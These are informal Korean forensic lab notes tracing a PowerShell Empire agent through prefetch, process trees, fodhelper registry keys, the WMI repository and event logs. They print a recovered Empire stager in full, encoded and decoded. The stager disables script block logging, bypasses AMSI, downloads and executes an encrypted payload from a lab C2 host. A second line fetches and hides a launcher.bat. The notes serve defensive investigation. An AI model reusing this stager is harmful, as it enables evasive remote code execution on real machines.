https://itshareit.tistory.com/3 (windows 업데이트 막기)
(FIOS#03) 4. 파워셸 포렌식 조사 기법.pdf
empire 연결단계 확인
작업 표시줄에는 , 파워쉘 이 안 뜨지만 프로세스 정보로는 나옴
pid 5012, pid 452
(FIOS#03) 4. 파워셸 포렌식 조사 기법.pdf
권한상승한 agent는 conhost가 부모 트리였습니다.
(windows 에서 process monitor 확인 결과 ) 192.168.134.102 http 통신
empire 공격 OS의 ip 192.168.134.102
Prefetch 분석
파일명과 경로 , 최초 생성 시간 ,수정 시간 , 최근 실행 시간 확인 가능
다시 깔고 처음 연결했을때 prefetch view 결과
CKQSXC5G.PGK.PS1 (처음 powershell 연결한 상황에서 잡힌 유일한 ps1 파일 )
연결과정에 있어서 PS1 생성과 관련이 있는지 알아보기
winprefetch viewer 로 봤을 때 , 실행 카운터가 2번 (2번 시도했었음)
empire 권한 상승시 fodhelper를 호출했음을 확인할 수 있었습니다.
powershell이 fodhelper를 실행하는 도중 실행이 되었습니다.
prcoess explorer 분석
fodhelper 레지스트리 분석
PID
powershell = > conhost = > 권한 상승된 powershell agent
fod 관련 레지스트리
Maximum allowed
관련된 레지스트리 제거
(ip.src, ip.dest가 kali ip address, port 8080. http 통신 ,tcp)
C:\Windows\System32\wbem\Repository\OBJECTS.DATA
powershell.exe 검색
SQBmACgAJABQAFMAVgBlAFIAUwBpAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBlAHIAUwBpAG8AbgAuAE0AYQBKAG8AcgAgAC0AZwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAGYAXQAuAEEAUwBzAGUAbQBCAGwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAGEATAB1AEUAKAAkAG4AVQBsAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBMAD0AWwBDAG8AbABMAGUAQwBUAEkATwBuAHMALgBHAGUATgBlAHIAaQBjAC4ARABpAGMAVABJAE8AbgBhAFIAWQBbAFMAdAByAEkAbgBHACwAUwB5AFMAVABFAG0ALgBPAGIASgBlAEMAdABdAF0AOgA6AE4AZQB3ACgAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AGEATAB9AEUAbABzAEUAewBbAFMAYwByAGkAUABUAEIAbABvAEMASwBdAC4AIgBHAGUAdABGAGkARQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAGwAdQBFACgAJABuAHUATABsACwAKABOAEUAVwAtAE8AYgBqAGUAQwBUACAAQwBPAGwATABFAGMAdABJAG8ATgBzAC4ARwBFAG4AZQByAEkAQwAuAEgAQQBTAGgAUwBFAFQAWwBTAFQAUgBpAE4ARwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAcwBTAGUATQBCAGwAWQAuAEcAZQBUAFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAFQARgBJAGUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAEEATAB1AGUAKAAkAG4AVQBsAEwALAAkAHQAcgBVAGUAKQB9ADsAfQA7AFsAUwBZAHMAdABFAE0ALgBOAGUAVAAuAFMARQByAFYASQBjAEUAUABvAEkATgBUAE0AQQBuAGEARwBlAFIAXQA6ADoARQBYAHAARQBDAFQAMQAwADAAQwBPAG4AVABpAE4AVQBlAD0AMAA7ACQAdwBjAD0ATgBFAFcALQBPAGIASgBlAGMAdAAgAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBXAGUAYgBDAEwAaQBFAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAEgARQBBAGQARQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAWQA9AFsAUwB5AFMAdABlAG0ALgBOAGUAVAAuAFcARQBiAFIARQBRAFUAZQBTAFQAXQA6ADoARABFAEYAYQB1AGwAVABXAEUAYgBQAFIAbwB4AFkAOwAkAHcAQwAuAFAAcgBPAFgAeQAuAEMAcgBFAGQARQBuAHQAaQBhAEwAUwAgAD0AIABbAFMAWQBTAFQAZQBNAC4ATgBFAHQALgBDAHIAZQBEAEUAbgBUAEkAYQBMAEMAQQBDAEgAZQBdADoAOgBEAEUARgBhAFUATAB0AE4AZQBUAHcAbwBSAEsAQwByAGUARABFAE4AVABpAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAFMAdABFAG0ALgBUAEUAWABUAC4ARQBOAEMAbwBEAEkAbgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAeQB0AGUAUwAoACcAUgBpAHIAXQBwADMAMAA2AFoANwBnAG8ALwBrADgAOwA0AFMAeABmADoAUQBjAEEAOQA9ACoAMgA8AHQAQgA1ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgA2AC4AMQAwADIAOgA4ADAAOAAwACcAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAHcAQwAuAEgARQBBAEQARQBSAFMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AHAAdAB6AHUASgBiAFUAZgBMAG0ASAAvAGQAOQBYADYANwBZAGgAMgBYADkATgBNAC8ANgBvAD0AIgApADsAJABkAEEAdABhAD0AJABXAEMALgBEAG8AVwBuAGwAbwBhAGQARABBAHQAQQAoACQAcwBlAHIAKwAkAHQAKQA7ACQASQBWAD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABEAGEAdABBAFsANAAuAC4AJABEAEEAdABBAC4AbABlAG4ARwBUAEgAXQA7AC0AagBPAGkAbgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAEEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
If($PSVeRSiONTaBlE.PSVerSion.MaJor -ge 3){$GPF=[REf].ASsemBly.GEtTYpe('System.Management.Automation.Utils')."GETField"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLuE($nUll);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[ColLeCTIOns.GeNeric.DicTIOnaRY[StrInG,SySTEm.ObJeCt]]::New();$vaL.Add('EnableScriptB'+'lockLogging',0);$Val.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScriPTBloCK]."GetFiELD"('signatures','N'+'onPublic,Static').SetVAluE($nuLl,(NEW-ObjeCT COlLEctIoNs.GEnerIC.HAShSET[STRiNG]))}[REf].AsSeMBlY.GeTTypE('System.Management.Automation.AmsiUtils')|?{$}|%{$.GETFIeLD('amsiInitFailed','NonPublic,Static').SetVALue($nUlL,$trUe)};};[SYstEM.NeT.SErVIcEPoINTMAnaGeR]::EXpECT100COnTiNUe=0;$wc=NEW-ObJect SysTem.NEt.WebCLiEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HEAdErs.ADD('User-Agent',$u);$wc.ProxY=[SyStem.NeT.WEbREQUeST]::DEFaulTWEbPRoxY;$wC.PrOXy.CrEdEntiaLS = [SYSTeM.NEt.CreDEnTIaLCACHe]::DEFaULtNeTwoRKCreDENTiALs;$Script:Proxy = $wc.Proxy;$K=[SYStEm.TEXT.ENCoDInG]::ASCII.GETByteS('Rir]p306Z7go/k8;4Sxf:QcA9=2<tB5');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$]+$K[$%$K.CouNt])%256;$S[$],$S[$J]=$S[$J],$S[$*]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://192.168.226.102:8080';$t='/news.php';$wC.HEADERS.AdD("Cookie","session=ptzuJbUfLmH/d9X67Yh2X9NM/6o=");$dAta=$WC.DoWnloadDAtA($ser+$t);$IV=$daTA[0..3];$daTA=$DatA[4..$DAtA.lenGTH];-jOin[CHar[]](& $R $DAta ($IV+$K))|IEX
dwBnAGUAdAAgACIAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQAvAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiAGwAYQB1AG4AYwBoAGUAcgAuAGIAYQB0ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAC4AXABsAGEAdQBuAGMAaABlAHIALgBiAGEAdAAgAC0AVwBhAGkAdAAgAC0AcABhAHMAcwB0AGgAcgB1ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA7AA==
wget "http://127.0.0.1/launcher.bat" -outfile "launcher.bat"; Start-Process -FilePath .\launcher.bat -Wait -passthru -WindowStyle Hidden;
Microsoft-Windows-PowerShell%4Operational.evtx
(앞에 file system에서 찾은거와 동일)
비슷한 내용을 C:\Windows\System32\winevt\Logs\Windows PowerShell 이벤트로그에서 발견 가능
0x3EX, NT Authority, WORKGROUP 주목